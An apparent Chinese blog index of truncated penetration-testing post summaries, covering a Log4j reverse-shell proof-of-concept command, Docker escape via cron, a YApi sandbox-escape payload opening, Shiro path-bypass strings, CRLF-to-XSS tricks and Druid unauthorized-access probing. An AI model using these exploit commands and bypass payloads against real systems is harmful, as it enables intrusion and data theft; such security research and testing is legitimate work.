摘要: 参考文章 https://mp.weixin.qq.com/s/VzZQrMcj1BgMWrkvwd2z0Q 1、vps 下载ddddocr api server git clone https://github.com/sml2h3/ocr_api_server.git cd ocr_api_se 阅读全文
posted @ 2022-07-20 14:47 Carrypan 阅读(474) 评论(0) 推荐(0) 编辑
摘要: 日常渗透发现的某企业存在Confluence未授权rce的漏洞,隔了一个周末后发现被waf拦截了,所以多了个和waf对抗的故事...... 1、HTTP隧道传输/ HTTP pipeline【失败】 通过使用 Connection: keep-alive 达到一次传输多个http包的效果; POST 阅读全文
posted @ 2022-02-15 17:37 Carrypan 阅读(445) 评论(0) 推荐(0) 编辑
摘要: 0x00 反弹shell 靶机:10.110.13.153 java -jar log4jRCE-0.0.1-SNAPSHOT.jar http://10.110.13.153:18080/ 攻击机:10.110.13.106 python3 poc.py --userip 10.110.13.10 阅读全文
posted @ 2022-01-07 19:30 Carrypan 阅读(6255) 评论(0) 推荐(0) 编辑
摘要: 看了jsfinder和jsinfo-scan等脚本,结合实战经验,简单改造了一下, 源码地址 https://github.com/Carrypan2022/leakfinder 1、将hae的正则加入,匹配接口返回的手机号、身份证号码; 2、接口加入spring系列、druid目录进行扫描,然后匹 阅读全文
posted @ 2021-10-15 14:59 Carrypan 阅读(531) 评论(0) 推荐(0) 编辑
摘要: 1.1. Docker判断 cat /proc/1/cgroup ls -alh /.dockerenv 1.2. Docker反弹shell 条件: 获取到宿主机普通用户权限 当前用户已加入docker用户组 a) 写入计划任务获取root权限 进入容器: docker run -it -v /: 阅读全文
posted @ 2021-09-09 14:22 Carrypan 阅读(363) 评论(0) 推荐(0) 编辑
摘要: 注册或者爆破获取用户登录权限登陆系统: 添加项目: 添加接口 添加mock脚本: payload: const sandbox = this const ObjectConstructor = this.constructor const FunctionConstructor = ObjectCo 阅读全文
posted @ 2021-07-08 18:23 Carrypan 阅读(1011) 评论(0) 推荐(0) 编辑
摘要: druid未授权访问漏洞挖到过很多,但是多数都是没有后续利用的,最近碰到了几个,简单记录下: 主要关注这几个点 URL监控泄露URI接口信息 这里遍历接口有个小技巧,我们首先选取一些可能涉及敏感信息的接口去做测试,当然这里有很多接口是需要带参数访问的,不带参数请求时有些服务端会返回参数,但是对于参数 阅读全文
posted @ 2021-05-27 18:02 Carrypan 阅读(2013) 评论(0) 推荐(1) 编辑
摘要: 测试发现一个js接口,里面包含了众多js接口拼接路径信息: 将接口提取出来,通过jsfinder批量提取js里的接口,经提取发现 直接访问 返回404,大概率是目录路径不正确,返回登录接口,抓个包,找到二级目录,继续拼接: 正常访问,无数据返回,尝试使用%模糊搜索,如下图: 阅读全文
posted @ 2021-05-10 10:31 Carrypan 阅读(1382) 评论(0) 推荐(0) 编辑
摘要: SRC挖掘中碰到302挑战场景的CRLF,可利用ws://或者wss://这两个schema uri协议绕过location触发xss漏洞 附url_schema,方便fuzz: aaaaaasaboutacapacctacdacradiumxtraadtafpafsaimamssandroidap 阅读全文
posted @ 2021-04-15 14:08 Carrypan 阅读(914) 评论(0) 推荐(0) 编辑
摘要: 测试发现shiro框架网站二级目录下存在/actuator/info目录,但是无权限访问,如下图: 利用shiro权限绕过漏洞构造payload:/xxx//actuator/env,可成功访问: shiro权限绕过利用姿势: ⽆ Shiro < 1.5.0 尾斜杠 /admin/CVE-2020- 阅读全文
posted @ 2021-04-15 10:37 Carrypan 阅读(1121) 评论(0) 推荐(0) 编辑